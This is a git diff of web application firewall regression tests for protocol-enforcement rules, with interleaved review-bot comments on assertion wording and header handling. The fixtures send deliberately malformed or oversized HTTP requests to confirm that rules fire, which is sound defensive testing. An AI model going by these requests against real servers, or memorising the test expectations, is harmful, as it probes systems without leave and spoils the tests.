@@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920272\"" + log: + expect_ids: [920272] - test_id: 2 stages: - input: @@ -29,7 +29,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920272\"" + log: + expect_ids: [920272] - test_id: 3 stages: - input: @@ -42,7 +43,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920272\"" + log: + expect_ids: [920272] - test_id: 4 stages: - input: @@ -55,7 +57,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920272\"" + log: + no_expect_ids: [920272] - test_id: 5 stages: - input: @@ -69,4 +72,5 @@ tests: version: "HTTP/1.1" output: status: 200 - log_contains: "id \"920272\"" + log: + expect_ids: [920272] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml index e66263274..981cc1c8a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920273 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920273\"" + log: + expect_ids: [920273] - # the '&' is one of the only symbol allowed test_id: 2 stages: 
@@ -30,7 +30,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920273\"" + log: + no_expect_ids: [920273] - test_id: 3 stages: - input: @@ -44,7 +45,8 @@ tests: data: "<hello" version: "HTTP/1.1" output: - log_contains: "id \"920273\"" + log: + expect_ids: [920273] - test_id: 4 stages: - input: @@ -57,7 +59,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920273\"" + log: + no_expect_ids: [920273] - test_id: 5 stages: - input: @@ -70,4 +73,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920273\"" + log: + expect_ids: [920273] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml index d564f97dd..bcd73842f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml 
@@ -1,27 +1,25 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920274 tests: - - # Apache will just error on this and return 400 - # as a result we look for forbidden or 400 - # In the future FTW should support OR versus AND output - # https://github.com/coreruleset/ftw/issues/19 - test_id: 1 + - test_id: 1 + desc: | + Apache will just error on this and return 400, as a result we look for forbidden or 400. + In the future FTW should support OR versus AND output. + https://github.com/coreruleset/ftw/issues/19 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=test1" + uri: "/get?test=test1" headers: User-Agent: "OWASP CRS test agent" - Host: "localhost" + Host: "localhost%1F" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - status: 200 - # log_contains: "id \"920274\"" + status: 400 - test_id: 2 stages: - input: @@ -34,13 +32,14 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920274\"" + log: + no_expect_ids: [920274] - test_id: 3 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=test1HI" + uri: "/get?test=test1HI" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" @@ -48,13 +47,14 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920274\"" + log: + no_expect_ids: [920274] - test_id: 4 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=test1HI" + uri: "/get?test=test1HI" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" 
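Review bot: Test 1 of 920274 (first hunk) now checks only `status: 400` with no `log` block, while its new `desc` still says "we look for forbidden or 400", so the wording no longer matches the single assertion and rule 920274 is never asserted. The header value `Host: "localhost%1F"` is a literal percent-encoded string unless the runner decodes it, so the 400 presumably comes from the server's Host validation rather than from CRS; the `desc` should state that plainly, e.g. `Apache rejects this Host header with 400 before CRS runs; only the status is asserted.` If the intent is instead to reach the rule, a `log: expect_ids: [920274]` block is the missing check. The test section continues past the end of the hunk.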
@@ -62,13 +62,14 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920274\"" + log: + expect_ids: [920274] - test_id: 5 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=test1HI" + uri: "/get?test=test1HI" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" @@ -76,7 +77,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920274\"" + log: + no_expect_ids: [920274] - test_id: 6 stages: - input: @@ -90,4 +92,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920274\"" + log: + no_expect_ids: [920274] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml index f3a55b37f..3b3895419 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920275.yaml @@ -17,7 +17,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920275\"" + log: + expect_ids: [920275] - test_id: 2 stages: - input: @@ -31,7 +32,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920275\"" + log: + no_expect_ids: [920275] - test_id: 3 stages: - input: @@ -45,7 +47,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920275\"" + log: + no_expect_ids: [920275] - test_id: 4 stages: - input: 
@@ -59,7 +62,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920275\"" + log: + expect_ids: [920275] - test_id: 5 stages: - input: @@ -73,7 +77,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920275\"" + log: + no_expect_ids: [920275] - test_id: 6 stages: - input: @@ -87,4 +92,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920275\"" + log: + no_expect_ids: [920275] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml index 0ca416cf1..d418e938b 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920280 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" output: - log_contains: "id \"920280\"" + log: + expect_ids: [920280] - test_id: 2 stages: - input: @@ -29,7 +29,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920280\"" + log: + no_expect_ids: [920280] - test_id: 3 stages: - input: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml index 26d77d142..04b8eac71 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml 
@@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920290 tests: - # Apache will block this with a 400 and it will @@ -33,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920290\"" + log: + no_expect_ids: [920290] - test_id: 3 stages: - input: @@ -46,7 +46,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920290\"" + log: + no_expect_ids: [920290] - test_id: 4 desc: Status Page Test - test for empty host header stages: @@ -62,4 +63,5 @@ tests: # CRS prefers the use of encoded_request over raw_request. # Known reason is encoding issues with raw_request. output: - log_contains: "id \"920290\"" + log: + expect_ids: [920290] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml index e611b644f..ca5d84fbb 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml @@ -22,7 +22,8 @@ tests: version: HTTP/1.0 data: '' output: - log_contains: id "920300" + log: + expect_ids: [920300] - test_id: 2 desc: "OPTIONS request: exempt from requiring an Accept request header" stages: @@ -36,7 +37,8 @@ tests: uri: "*" version: "HTTP/1.1" output: - no_log_contains: "id \"920300\"" + log: + no_expect_ids: [920300] - test_id: 3 desc: "CONNECT request: exempt from requiring an Accept request header" stages: @@ -52,7 +54,8 @@ tests: uri: "www.coreruleset.org:80" version: "HTTP/1.1" output: - no_log_contains: "id \"920300\"" + log: + no_expect_ids: [920300] - test_id: 4 desc: "User-Agent containing AppleWebKit: exempt from requiring an Accept request header" stages: @@ -66,4 +69,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920300\"" + log: + no_expect_ids: [920300] 
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml index eae7984c0..a801c0300 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920310.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920310 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920310\"" + log: + expect_ids: [920310] - test_id: 2 stages: - input: @@ -32,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920310\"" + log: + no_expect_ids: [920310] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920310\"" + log: + no_expect_ids: [920310] - test_id: 4 stages: - input: @@ -59,7 +61,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920310\"" + log: + expect_ids: [920310] - test_id: 5 stages: - input: @@ -73,7 +76,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920310\"" + log: + no_expect_ids: [920310] - test_id: 6 stages: - input: @@ -87,4 +91,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920310\"" + log: + no_expect_ids: [920310] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml index 55100c9b1..e61447696 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920311.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920311 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920311\"" + log: + expect_ids: [920311] - test_id: 2 stages: - input: 
@@ -32,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920311\"" + log: + no_expect_ids: [920311] - test_id: 3 stages: - input: @@ -45,4 +46,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920311\"" + log: + no_expect_ids: [920311] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml index 49cdafa43..8c67cf883 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920320.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920320 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920320\"" + log: + expect_ids: [920320] - test_id: 2 stages: - input: @@ -29,4 +29,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920320\"" + log: + no_expect_ids: [920320] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml index fcd07d3db..e9384bee9 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920330.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920330 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920330\"" + log: + expect_ids: [920330] - test_id: 2 stages: - input: @@ -30,4 +30,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920330\"" + log: + no_expect_ids: [920330] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml index 34eac16be..24c669bcf 100644 
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920340.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920340 tests: - test_id: 1 @@ -16,10 +15,11 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" data: "xy" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920340\"" + log: + expect_ids: [920340] - test_id: 2 desc: "Status Page Test - POST request with body content, a non-zero Content-Length header, but no Content-Type header" stages: @@ -34,7 +34,8 @@ tests: method: "POST" uri: "/" data: "abc" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920340\"" + log: + expect_ids: [920340] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml index ba967dafa..766159664 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920341.yaml @@ -20,9 +20,10 @@ tests: uri: "/pineapple" version: "HTTP/1.1" data: test - stop_magic: true + autocomplete_headers: false output: - log_contains: id "920341" + log: + expect_ids: [920341] - # Standard POST request with length and content-type test_id: 2 stages: @@ -40,7 +41,8 @@ tests: version: "HTTP/1.1" data: "{}" output: - no_log_contains: id "920341" + log: + no_expect_ids: [920341] - # Standard GET request (negative test) test_id: 3 stages: @@ -55,4 +57,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "920341" + log: + no_expect_ids: [920341] 
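Review bot: Replacing `stop_magic: true` with `autocomplete_headers: false` in test 1 of 920340 changes what the harness adds to the request, and the context line from test 2's `desc` in the same hunk describes the request as carrying a non-zero Content-Length but no Content-Type; if `autocomplete_headers: false` also stops the harness from computing Content-Length, that header must be set explicitly in the input's `headers:` block (outside this hunk), otherwise the request no longer matches the description and 920340 fires for a different reason than the test claims. The same substitution is made in test 2 of 920340 and in test 1 of 920341 below, so the check applies there too. Separately, 920341 keeps its per-test explanations as YAML comments wedged between the sequence dash and the key (`- # Standard POST request with length and content-type`, then `test_id: 2`), while the 920274 hunk in this commit moved the same kind of comment into `desc:`; converting these to `desc:` as well would keep the explanation attached to the test after parsing instead of being discarded with the comment.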
diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml index 93ee8c5bd..ebba3e733 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920350.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920350 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 2 stages: - input: @@ -31,7 +31,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920350\"" + log: + no_expect_ids: [920350] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 4 stages: - input: @@ -59,7 +61,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 5 stages: - input: @@ -73,7 +76,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 6 stages: - input: @@ -87,7 +91,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920350\"" + log: + expect_ids: [920350] - test_id: 7 stages: - input: @@ -101,7 +106,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920350\"" + log: + no_expect_ids: [920350] - test_id: 8 stages: - input: @@ -115,4 +121,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920350\"" + log: + no_expect_ids: [920350] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml index 0a975a77f..3c3da7b19 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml 
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml @@ -23,4 +23,5 @@ tests: uri: "/?11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111=foo" version: HTTP/1.0 output: - log_contains: id "920360" + log: + expect_ids: [920360] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml index a22282207..f1f04baa6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920370.yaml @@ -22,4 +22,5 @@ tests: uri: /?foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 version: HTTP/1.0 output: - log_contains: id "920370" + log: + expect_ids: [920370] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml index a4a8bcd1d..2456b7a55 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920380.yaml 
@@ -22,4 +22,5 @@ tests: uri: /?param1=1¶m2=1¶m3=1¶m4=1¶m5=1¶m6=1¶m7=1¶m8=1¶m9=1¶m10=1¶m11=1¶m12=1¶m13=1¶m14=1¶m15=1¶m16=1¶m17=1¶m18=1¶m19=1¶m20=1¶m21=1¶m22=1¶m23=1¶m24=1¶m25=1¶m26=1¶m27=1¶m28=1¶m29=1¶m30=1¶m31=1¶m32=1¶m33=1¶m34=1¶m35=1¶m36=1¶m37=1¶m38=1¶m39=1¶m40=1¶m41=1¶m42=1¶m43=1¶m44=1¶m45=1¶m46=1¶m47=1¶m48=1¶m49=1¶m50=1¶m51=1¶m52=1¶m53=1¶m54=1¶m55=1¶m56=1¶m57=1¶m58=1¶m59=1¶m60=1¶m61=1¶m62=1¶m63=1¶m64=1¶m65=1¶m66=1¶m67=1¶m68=1¶m69=1¶m70=1¶m71=1¶m72=1¶m73=1¶m74=1¶m75=1¶m76=1¶m77=1¶m78=1¶m79=1¶m80=1¶m81=1¶m82=1¶m83=1¶m84=1¶m85=1¶m86=1¶m87=1¶m88=1¶m89=1¶m90=1¶m91=1¶m92=1¶m93=1¶m94=1¶m95=1¶m96=1¶m97=1¶m98=1¶m99=1¶m100=1¶m101=1¶m102=1¶m103=1¶m104=1¶m105=1¶m106=1¶m107=1¶m108=1¶m109=1¶m110=1¶m111=1¶m112=1¶m113=1¶m114=1¶m115=1¶m116=1¶m117=1¶m118=1¶m119=1¶m120=1¶m121=1¶m122=1¶m123=1¶m124=1¶m125=1¶m126=1¶m127=1¶m128=1¶m129=1¶m130=1¶m131=1¶m132=1¶m133=1¶m134=1¶m135=1¶m136=1¶m137=1¶m138=1¶m139=1¶m140=1¶m141=1¶m142=1¶m143=1¶m144=1¶m145=1¶m146=1¶m147=1¶m148=1¶m149=1¶m150=1¶m151=1¶m152=1¶m153=1¶m154=1¶m155=1¶m156=1¶m157=1¶m158=1¶m159=1¶m160=1¶m161=1¶m162=1¶m163=1¶m164=1¶m165=1¶m166=1¶m167=1¶m168=1¶m169=1¶m170=1¶m171=1¶m172=1¶m173=1¶m174=1¶m175=1¶m176=1¶m177=1¶m178=1¶m179=1¶m180=1¶m181=1¶m182=1¶m183=1¶m184=1¶m185=1¶m186=1¶m187=1¶m188=1¶m189=1¶m190=1¶m191=1¶m192=1¶m193=1¶m194=1¶m195=1¶m196=1¶m197=1¶m198=1¶m199=1¶m200=1¶m201=1¶m202=1¶m203=1¶m204=1¶m205=1¶m206=1¶m207=1¶m208=1¶m209=1¶m210=1¶m211=1¶m212=1¶m213=1¶m214=1¶m215=1¶m216=1¶m217=1¶m218=1¶m219=1¶m220=1¶m221=1¶m222=1¶m223=1¶m224=1¶m225=1¶m226=1¶m227=1¶m228=1¶m229=1¶m230=1¶m231=1¶m232=1¶m233=1¶m234=1¶m235=1¶m236=1¶m237=1¶m238=1¶m239=1¶m240=1¶m241=1¶m242=1¶m243=1¶m244=1¶m245=1¶m246=1¶m247=1¶m248=1¶m249=1¶m250=1¶m251=1¶m252=1¶m253=1¶m254=1¶m255=1¶m256=1 version: HTTP/1.0 output: - log_contains: id "920380" + log: + expect_ids: [920380] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml index 4aa7d01a8..772e19de9 100644 
--- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml
+++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920390.yaml
@@ -21,8 +21,9 @@ tests: User-Agent: "OWASP CRS test agent" method: POST port: 80 - uri: / + uri: /post version: HTTP/1.1 data: foo=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111